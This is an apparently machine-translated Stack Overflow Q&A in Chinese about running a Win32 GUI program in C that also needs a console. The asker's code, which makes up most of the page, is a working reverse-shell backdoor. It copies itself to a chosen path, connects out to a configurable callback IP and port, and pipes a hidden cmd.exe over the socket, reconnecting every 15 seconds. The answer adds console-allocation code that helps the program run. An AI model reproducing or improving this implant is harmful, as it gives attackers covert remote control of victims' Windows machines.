c - 编译为 GUI 的 Win32 GUI 应用程序需要使用 C 语言的控制台

标签 c windows winapi

我正在创建一个程序,它有两个方面。主执行(script.exe -setup)将打开一个控制台并向用户询问多个问题,然后将答案设置为变量并根据答案对机器进行调整。这是一个简单的控制台应用程序,如果编译为控制台应用程序,它可以正常工作。

脚本的第二部分 (script.exe -socket 192.168.1.1:9000) 将启动 WinMain 函数,然后调用套接字函数。我将套接字函数放在 WinMain 中的原因是它不会显示 CreateProcess 调用的“cmd.exe”。它闪烁着命令提示符,所以我使用 WinMain 摆脱了它。这仅在编译为 Win32 应用程序时按预期工作,但随后我无法运行脚本的安装部分。

我知道当编译为控制台应用程序时,它以 (int main()) 函数开头,这就是它工作的原因。当编译为 Win32 时,它以 (WinMain()) 函数开始。但是,我只需要应用程序作为 Win32 应用程序在 Main 处启动。

int main(int argc, char *argv[]) {
    char filePath[150];
    char fileName[30];
    int portNum;
    char ip[16];
    char socket[23];

    if (argc == 1) {
        printf("Usage: File.exe setup OR File.exe -s IP:PORT");
        exit(0);
    } else if (strcmp(argv[1], "setup") == 0) {
        printf("Doing Setup Stuff\n");
    } else if (strcmp(argv[1], "-socket") == 0){
        strncpy(socket, argv[2], 22);
        WinMain(0,0,socket,0);
        return 0;
    } else {
        printf("Usage: File.exe setup OR File.exe -socket IP:PORT");
        exit(0);
    }

    printf("Desired File Location. Example: C:\\Test\n");
    scanf("%149s", filePath);
    CheckDirectory(filePath);

    printf("\nDesired file name. Example: test.exe\n");
    scanf("%29s", fileName);
    getchar();
    CopyNewFile(filePath, fileName, argv[0]);

    printf("\nEnter callback IP:\n");
    scanf("%15s", ip);

    printf("\nEnter callback port:\n");
    scanf("%5d", &portNum);


    printf("Enter time in seconds for each callback: ");
    scanf("%10d", &secs);

    return 0;
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR cmdline, int show) {
    char test[50];
    strncpy(test, cmdline, 49);
    char *ip = strtok(test, ":");
    char *port = strtok(NULL, ":");
    RunSocket(ip, port);
    return 0;
}

void CopyNewFile(char *dir, char *fname, char *curName) {
char fullDir[300];
char file[60];
sprintf(file,"%s", curName);
sprintf(fullDir, "%s\\%s", dir, fname);
if (CopyFile(file, fullDir, FALSE)) {
    printf("\nCopied new file!\n");
} else {
    printf("Did not copy!");
    }
}


void CheckDirectory(char *d) {
DIR* dir = opendir(d);
char answer[2];

if (dir) {
    printf("Directory Exists!\n");
    closedir(dir);
} else if (ENOENT == errno) {
    printf("Directory does not exist. Do you want to create this directory? Y/N: ");
    scanf("%s", answer);
    if (strcmp(answer, "y") == 0) {
        if (CreateDirectory(d, NULL)) {
            printf("Created Directory!\n");
        } else {
            printf("Error Creating Directory!");
            exit(1);
        }
    } else {
        printf("Closing Script!");
        exit(1);
    }
}
}

void RunSocket(char *a, char *b) {

    while(1) {

        WSADATA wsaData;
        SOCKET Winsock;
        struct sockaddr_in hax;
        char ip_addr[16];
        STARTUPINFO ini_processo;
        PROCESS_INFORMATION processo_info;

        WSAStartup(MAKEWORD(2,2), &wsaData);
        Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

        struct hostent *host;
        host = gethostbyname(a);
        strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

        hax.sin_family = AF_INET;
        hax.sin_port = htons(atoi(b));
        hax.sin_addr.s_addr =inet_addr(ip_addr);

        WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL);

        memset(&ini_processo, 0, sizeof(ini_processo));
        ini_processo.cb=sizeof(ini_processo);
        ini_processo.dwFlags=STARTF_USESTDHANDLES;
        ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
        CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &ini_processo, &processo_info);
        Sleep(15000);
        }
}

最佳答案

它要么是 Windows 应用程序,然后 WinMain 是用户启动点,要么是控制台应用程序,然后 main 是用户启动点。您当然可以从 WinMain 调用 main,或者您可以为通常从 main 执行的功能分配一个控制台。

以下内容分配控制台并设置标准文件句柄:

#ifndef _WIN32_WINNT
# define _WIN32_WINNT   0x0501
#endif
#include <windows.h>
#include <wincon.h>
#include <stdio.h>

int GetConsole(void)
{
    if (!AttachConsole(ATTACH_PARENT_PROCESS))
        if (!AllocConsole())
            return(0);

    _fileno(stdout)= _fileno(fopen("CON", "w"));
    _fileno(stdin) = _fileno(fopen("CON", "r"));
    _fileno(stderr)= _fileno(fopen("CON", "w"));
    return(1);
}

关于c - 编译为 GUI 的 Win32 GUI 应用程序需要使用 C 语言的控制台,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/48444176/

相关文章:

c - Win32 快捷菜单在任何情况下都不发送消息

winapi - 何时调用 CloseTouchInputHandle

c++ - 这两种寻址方式有什么区别

char *string[]声明错误

windows - 在 Windows Kafka 上删除主题时出现 AccessDeniedException

windows - 在 Mercurial 中配置 eol 扩展的问题

c++ - Windows 7:超越 C++ std::this_thread::sleep_for

c - 理解 C 程序输出的问题

c - 指向多种类型的指针数组,C

c++ - 在 C++ 中获取 PowerShell::Create.AddScript.Invoke 返回值